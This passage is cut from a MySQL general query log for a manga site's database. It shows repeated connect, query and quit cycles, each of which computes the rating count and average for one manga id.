total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '41' order by created desc 330651338 Quit 330651339 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651339 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '75' order by created desc 330651339 Quit 330651340 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651340 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '177' order by created desc 330651340 Quit 330651341 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651341 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330651341 Quit 330651342 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651342 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '87' order by created desc 330651342 Quit 330651343 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651343 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '83' order by created desc 330651343 Quit 330651344 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651344 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '112' order by created desc 330651344 Quit 330651345 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651345 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330651345 Quit 330651346 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651346 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '230' order by created desc 330651346 Quit 330651347 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651347 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '248' order by created desc 330651347 Quit 330651348 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651348 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '85' order by created desc 330651348 Quit 330651349 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651349 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '77' order by created desc 330651349 Quit 330651350 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651350 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330651350 Quit 330651351 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651351 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '39' order by created desc 330651351 Quit 330651352 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651352 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '128' order by created desc 330651352 Quit 330651353 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651353 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330651353 Quit 330651354 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651354 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '94' order by created desc 330651354 Quit 330651355 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651355 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '228' order by created desc 330651355 Quit 330651356 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651356 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330651356 Quit 330651357 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651357 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '105' order by created desc 330651357 Quit 330651358 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651358 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '48' order by created desc 330651358 Quit 330651359 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651359 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '204' order by created desc 330651359 Quit 330651360 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651360 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330651360 Quit 330651361 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651361 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '70' order by created desc 330651361 Quit 330651362 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651362 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '259' order by created desc 330651362 Quit 330651363 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651363 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '175' order by created desc 330651363 Quit 330651364 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651364 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330651364 Quit 330651365 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651365 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '82' order by created desc 330651365 Quit 330651366 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651366 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '202' order by created desc 330651366 Quit 330651367 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651367 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '6' order by created desc 330651367 Quit 330651368 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651368 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '67' order by created desc 330651368 Quit 330651369 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651369 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '267' order by created desc 330651369 Quit 330651370 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651370 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '210' order by created desc 330651370 Quit 330651371 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651371 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '180' order by created desc 330651371 Quit 330651372 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651372 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330651372 Quit 330651373 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651373 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '129' order by created desc 330651373 Quit 330651374 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651374 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '102' order by created desc 330651374 Quit 330651375 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651375 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '113' order by created desc 330651375 Quit 330651376 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651376 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '199' order by created desc 330651376 Quit 330651377 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651377 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '288' order by created desc 330651377 Quit 330651378 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651378 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330651378 Quit 330651379 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651379 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '73' order by created desc 330651379 Quit 330651380 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651380 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '125' order by created desc 330651380 Quit 330651381 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651381 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '37' order by created desc 330651381 Quit 330651382 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651382 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '213' order by created desc 330651382 Quit 330651383 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651383 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330651383 Quit 330651384 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651384 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '86' order by created desc 330651384 Quit 330651385 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651385 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '117' order by created desc 330651385 Quit 330651386 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651386 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '91' order by created desc 330651386 Quit 330651387 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651387 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '307' order by created desc 330651387 Quit 330651388 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651388 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '24' order by created desc 330651388 Quit 330651389 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651389 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '84' order by created desc 330651389 Quit 330651390 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651390 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '243' order by created desc 330651390 Quit 330651391 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651391 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '178' order by created desc 330651391 Quit 330651392 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651392 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '81' order by created desc 330651392 Quit 330651393 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651393 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '191' order by created desc 330651393 Quit 330651394 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651394 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '44' order by created desc 330651394 Quit 330651395 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651395 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '15' order by created desc 330651395 Quit 330651396 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651396 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '116' order by created desc 330651396 Quit 330651397 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651397 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330651397 Quit 330651398 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651398 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '103' order by created desc 330651398 Quit 330651399 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651399 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330651399 Quit 330651400 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651400 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '14' order by created desc 330651400 Quit 330651401 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651401 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '42' order by created desc 330651401 Quit 330651402 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651402 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '257' order by created desc 330651402 Quit 330651403 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651403 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '324' order by created desc 330651403 Quit 330651404 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651404 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '201' order by created desc 330651404 Quit 330651405 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651405 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '120' order by created desc 330651405 Quit 330651406 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651406 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '10' order by created desc 330651406 Quit 330651407 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651407 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '2' order by created desc 330651407 Quit 330651408 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651408 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '198' order by created desc 330651408 Quit 330651409 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651409 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '16' order by created desc 330651409 Quit 330651410 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651410 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '261' order by created desc 330651410 Quit 330651411 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651411 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330651411 Quit 330651412 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651412 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '338' order by created desc 330651412 Quit 330651413 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651413 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330651413 Quit 330651414 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651414 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '237' order by created desc 330651414 Quit 330651415 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651415 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '224' order by created desc 330651415 Quit 330651416 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651416 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '53' order by created desc 330651416 Quit 330651417 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651417 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '231' order by created desc 330651417 Quit 330651418 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651418 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '100' order by created desc 330651418 Quit 330651419 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651419 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '293' order by created desc 330651419 Quit 330651420 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651420 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '107' order by created desc 330651420 Quit 330651421 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651421 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '241' order by created desc 330651421 Quit 330651422 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651422 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '312' order by created desc 330651422 Quit 330651423 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651423 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '181' order by created desc 330651423 Quit 330651424 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651424 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '126' order by created desc 330651424 Quit 330651425 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651425 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '20' order by created desc 330651425 Quit 330651426 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651426 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330651426 Quit 330651427 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651427 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '18' order by created desc 330651427 Quit 330651428 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651428 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '122' order by created desc 330651428 Quit 330651429 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651429 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '190' order by created desc 330651429 Quit 330651430 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651430 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '227' order by created desc 330651430 Quit 330651431 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651431 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '284' order by created desc 330651431 Quit 330651432 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651432 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '322' order by created desc 330651432 Quit 330651433 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651433 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '123' order by created desc 330651433 Quit 330651434 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651434 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '196' order by created desc 330651434 Quit 330651435 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651435 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '308' order by created desc 330651435 Quit 330651436 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651436 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '266' order by created desc 330651436 Quit 330651437 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651437 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '226' order by created desc 330651437 Quit 330651438 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651438 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '11' order by created desc 330651438 Quit 330651439 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651439 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '219' order by created desc 330651439 Quit 330651440 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651440 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '72' order by created desc 330651440 Quit 330651441 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651441 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '292' order by created desc 330651441 Quit 330651442 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651442 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '34' order by created desc 330651442 Quit 330651443 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651443 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '221' order by created desc 330651443 Quit 330651444 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651444 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '174' order by created desc 330651444 Quit 330651445 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651445 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '209' order by created desc 330651445 Quit 330651446 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651446 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330651446 Quit 330651447 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651447 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '251' order by created desc 330651447 Quit 330651448 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651448 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '194' order by created desc 330651448 Quit 330651449 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651449 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '327' order by created desc 330651449 Quit 330651450 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651450 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330651450 Quit 330651451 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651451 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '298' order by created desc 330651451 Quit 330651452 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651452 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '65' order by created desc 330651452 Quit 330651453 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651453 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '200' order by created desc 330651453 Quit 330651454 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651454 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '187' order by created desc 330651454 Quit 330651455 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651455 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '185' order by created desc 330651455 Quit 330651456 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651456 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '311' order by created desc 330651456 Quit 330651457 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651457 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '184' order by created desc 330651457 Quit 330651458 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651458 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '235' order by created desc 330651458 Quit 330651459 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651459 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '242' order by created desc 330651459 Quit 330651460 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651460 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '331' order by created desc 330651460 Quit 330651461 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651461 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '211' order by created desc 330651461 Quit 330651462 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651462 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '176' order by created desc 330651462 Quit 330651463 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651463 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '321' order by created desc 330651463 Quit 330651464 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651464 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '339' order by created desc 330651464 Quit 330651465 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651465 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '183' order by created desc 330651465 Quit 330651466 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651466 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '220' order by created desc 330651466 Quit 330651467 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651467 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '349' order by created desc 330651467 Quit 330651468 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651468 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '3' order by created desc 330651468 Quit 330651469 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651469 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '249' order by created desc 330651469 Quit 330651470 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651470 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330651470 Quit 330651471 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651471 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '215' order by created desc 330651471 Quit 330651472 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651472 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '275' order by created desc 330651472 Quit 330651473 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651473 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '287' order by created desc 330651473 Quit 330651474 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651474 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '195' order by created desc 330651474 Quit 330651475 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651475 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '212' order by created desc 330651475 Quit 330651476 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651476 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '280' order by created desc 330651476 Quit 330651477 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651477 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '278' order by created desc 330651477 Quit 330651478 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651478 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '330' order by created desc 330651478 Quit 330651479 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651479 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330651479 Quit 330651480 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651480 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330651480 Quit 330651481 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651481 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '326' order by created desc 330651481 Quit 330651482 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651482 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '256' order by created desc 330651482 Quit 330651483 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651483 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330651483 Quit 330651484 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651484 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '114' order by created desc 330651484 Quit 330651485 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651485 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '294' order by created desc 330651485 Quit 330651486 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651486 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '276' order by created desc 330651486 Quit 330651487 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651487 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '320' order by created desc 330651487 Quit 330651488 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651488 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330651488 Quit 330651489 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651489 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330651489 Quit 330651490 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651490 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '277' order by created desc 330651490 Quit 330651491 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651491 Query select count(id) as total_rating, 